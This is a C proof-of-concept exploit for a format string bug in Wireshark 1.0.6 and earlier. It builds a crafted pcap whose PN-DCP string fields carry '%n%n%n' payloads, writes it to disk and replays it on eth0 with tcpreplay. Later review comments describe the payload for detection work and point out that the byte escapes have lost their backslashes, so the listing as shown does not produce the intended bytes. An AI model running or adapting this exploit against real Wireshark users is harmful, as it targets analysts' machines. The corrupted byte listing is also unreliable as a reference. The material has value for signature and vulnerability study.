# Title : Wireshark <= 1.0.6 PN-DCP Format String Exploit PoC
# Published : 2009-03-30
# Author : THCX Labs
/*
################## THCX #######################################
# Wireshark <= 1.0.6 PN-DCP format string bug POC
###############################################################
# [!] author: THCX Labs
# [!] PN-DCP either standalone or tunneled through DCE/RPC
# [!] opening the pcap file locally also works
###############################################################
*/
#include <stdio.h>
#include <stdlib.h>
#include <errno.h>
/*
 * Capture-file image that main() writes to disk unchanged.
 *
 * NOTE(review): as listed here the escapes carry no backslash ("xd4", not
 * "\xd4"), so a compiler sees ordinary ASCII text, not the bytes the hex
 * digits spell out. Presumably the backslashes were lost when the page was
 * extracted; confirm against the original advisory before relying on
 * this listing for signature work.
 *
 * Reading the digit pairs as hex:
 *   - d4 c3 b2 a1 at the start is the little-endian pcap file magic.
 *   - 81 00 followed by 88 92 recurs in the data: an 802.1Q tag followed
 *     by the PROFINET ethertype.
 *   - 25 6e 25 6e 25 6e 20, i.e. the text "%n%n%n ", occurs twice, each
 *     time a few bytes after a 02 02 pair (looks like a PN-DCP
 *     option/suboption header; verify against the protocol spec).
 *
 * The "%n" runs are the detection-relevant part. A dissector that hands
 * packet text to a printf-style routine as the format argument, instead
 * of as data for a "%s" conversion, will interpret them. Conversion
 * specifiers inside PN-DCP string fields are therefore a usable indicator
 * for capture triage. The title lists Wireshark versions up to and
 * including 1.0.6 as affected.
 */
char sploit[]=
"xd4xc3xb2xa1x02x00x04x00x00x00x00x00x00x00x00x00xffxffx00x00x01x00x00x00"
"x96x2cx8fx47x97xaax0dx00x22x00x00x00x22x00x00x00x00x02xe3x17xc7x50x00x80"
"xc8x38xa4x8bx81x00x00x00x88x92xfexfex05x00x01x00x00x01x00x01x00x04xffxff"
"x00x00x96x2cx8fx47x96xaex0dx00xd6x00x00x00xd6x00x00x00x00x80xc8x38xa4x8b"
"x00x02xe3x17xc7x50x81x00x00x00x88x92xfexffx05x01x01x00x00x01x00x00x00xb8"
"x02x05x00x10x00x00x02x01x02x02x02x03x02x04x02x05x01x01x01x02x02x01x00x0a"
"x00x00x53x37x2dx33x30x30x45x43x02x02x00x6ex00x00x25x6ex25x6ex25x6ex20x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00"
"x00x00x00x00x02x03x00x06x00x00x00x2ax01x01x02x04x00x04x00x00x02x00x01x02"
"x00x0ex00x01xc0xa8x00x0bxffxffxffx00xc0xa8x00x0bx97x2cx8fx47xf2xd0x0ex00"
"x32x00x00x00x32x00x00x00x00x02xe3x17xc7x50x00x80xc8x38xa4x8bx81x00x00x00"
"x88x92xfexfdx04x00x01x00x00x01x00x00x00x14x02x02x00x09x00x01x25x6ex25x6e"
"x25x6ex20x00x05x02x00x02x00x00x97x2cx8fx47x82xd2x0ex00x40x00x00x00x40x00"
"x00x00x00x80xc8x38xa4x8bx00x02xe3x17xc7x50x81x00x00x00x88x92xfexfdx04x01"
"x01x00x00x01x00x00x00x10x05x04x00x03x02x02x00x00x05x04x00x03x05x02x00x00"
"x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00x00";
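/*
 * Writes the sploit[] image to formatstringbug.pcap in the current working
 * directory, then passes that file to tcpreplay on interface eth0.
 *
 * Returns 0 when the file was written completely and the tcpreplay command
 * reported success, and 1 on any failure. The original ignored the results
 * of fwrite(), fclose() and system(), so a truncated or missing file still
 * exited with status 0.
 */
int main(void)
{
    FILE *fh = fopen("formatstringbug.pcap", "wb");
    if (!fh) {
        perror("no open");
        exit(1);
    }

    /*
     * sizeof sploit counts the string literal's terminating NUL, so that
     * byte is written to the file along with the listed data.
     */
    if (fwrite(sploit, sizeof sploit, 1, fh) != 1) {
        /* Report before fclose(), which may overwrite errno. */
        perror("write failed");
        fclose(fh);
        return 1;
    }

    /* fclose() flushes buffered data; a failure means the file is incomplete. */
    if (fclose(fh) != 0) {
        perror("close failed");
        return 1;
    }

    /*
     * The command line is a fixed literal, so no external input reaches the
     * shell. tcpreplay puts the recorded frames on the wire through eth0.
     */
    int r = system("tcpreplay -i eth0 formatstringbug.pcap");
    if (r != 0) {
        fprintf(stderr, "tcpreplay did not complete (status %d)\n", r);
        return 1;
    }

    return 0;
}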